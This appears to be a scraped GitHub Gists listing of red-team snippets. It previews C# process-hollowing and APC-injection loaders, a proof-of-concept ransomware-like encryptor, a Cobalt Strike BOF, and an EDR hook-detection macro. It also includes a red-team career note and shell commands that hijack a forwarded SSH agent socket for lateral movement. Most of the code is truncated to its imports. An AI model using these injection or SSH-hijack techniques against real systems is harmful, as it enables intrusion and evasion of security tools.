| Permission | Id |
|---|---|
| AgreementAcceptance.Read.All | d8e4ec18-f6c0-4620-8122-c8b1f2bf400e |
| Agreement.ReadWrite.All | c9090d00-6101-42f0-a729-c41074260d47 |
crusher chryzsh
2XXE-SRA
/ coldencryptor.cs
Last active
December 27, 2023 15:30
poc ransomware like script. generates then encrypts files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Security.Cryptography; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Threading.Tasks; | |
| using Microsoft.Win32; | |
| public class Crypto |
med0x2e
/ process-hollowing.cs
Last active
November 26, 2024 18:01
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace Hollowing | |
| { | |
| public class Loader | |
| { | |
| public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |
dgroh
/ application-permissions.md
Created
March 7, 2021 17:26
byt3bl33d3r
/ defender_update_check.cs
Last active
March 6, 2021 15:58
Uses the Windows Update Agent API (WUA API) COM Object to check if there are definition updates available for Windows Defender
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Add a reference to "WUAPI 2.0 Type Library" in Visual Studio | |
| // References: | |
| // - https://github.com/xonv/nagios-net-client/blob/0920114874ecc85fc7ab3a4426e547c9dc63a44a/NscaWinUpdateModule/WindowsUpdate.cs | |
| // - https://docs.microsoft.com/en-us/windows/win32/wua_sdk/portal-client | |
| using System; | |
| using WUApiLib; | |
| namespace WinUpdateTest | |
| { |
dmchell
/ getnamedpipes.cs
Created
January 31, 2021 18:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.IO; | |
| using System; | |
| namespace GetNamedPipes | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| Console.WriteLine("[*] Found the following pipes:"); |
jaredhaight
/ RedTeamThoughts.md
Created
January 22, 2021 19:45
A response to a DM on twitter asking about making the transition from pentesting to red teaming
I think there’s a couple fronts that make a good red teamer. The technical side of being operator is less about knowing how to use tools (that’s easy to teach) and more about knowing how the technologies you’re attacking works. Having an understanding of how things work at a company gives you the context of how to attack and abuse it.
For example the stronger your sysadmin skills, the better you’re going to be at moving through an enterprise. Stuff like knowing how group policies work, having a solid understanding of AD. It’s all about having that context so you know how to abuse it. Having a development background gives you the context of how to abuse CI/CD systems and such. Knowing how kubernetes, how cloud works, gives you context on how to maneuver around it. Honestly, I don’t think I’ve used a single exploit in red teaming (which probably means I’ve left stuff on the table and made life harder for myself lol), it’s all been about finding and abusing misconfigurations in environments.
I think in a tru
int0x80
/ SSH Agent Forwarding.md
Created
January 7, 2021 00:59
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]
user@internal:~$ hostname -f
internal.company.tld
G0ldenGunSec
/ EnumCLR.c
Last active
July 29, 2025 12:10
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
X-C3LL
/ hookdetector.vba
Created
December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
rvrsh3ll
/ DInjectQueuerAPC.cs
Created
November 20, 2020 15:10
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |